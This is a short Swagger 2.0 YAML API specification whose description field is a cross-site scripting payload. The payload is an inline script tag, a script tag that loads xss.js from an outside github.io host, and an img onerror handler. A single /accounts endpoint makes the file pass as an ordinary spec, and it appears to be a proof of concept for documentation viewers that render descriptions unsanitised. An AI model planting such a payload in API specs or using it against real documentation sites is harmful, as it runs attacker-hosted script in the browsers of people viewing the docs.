swagger: '2.0'
info:
  title: Example yaml.spec1
  description: 
    <script>function test(){ alter('aaaa') }</script><script src='https://zerone0x01.github.io/xss.js'></script><a title='test' > test </a><img src='1' onerror='test()'/>
paths:
  /accounts:
    get:
      responses:
        '200':
          description: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
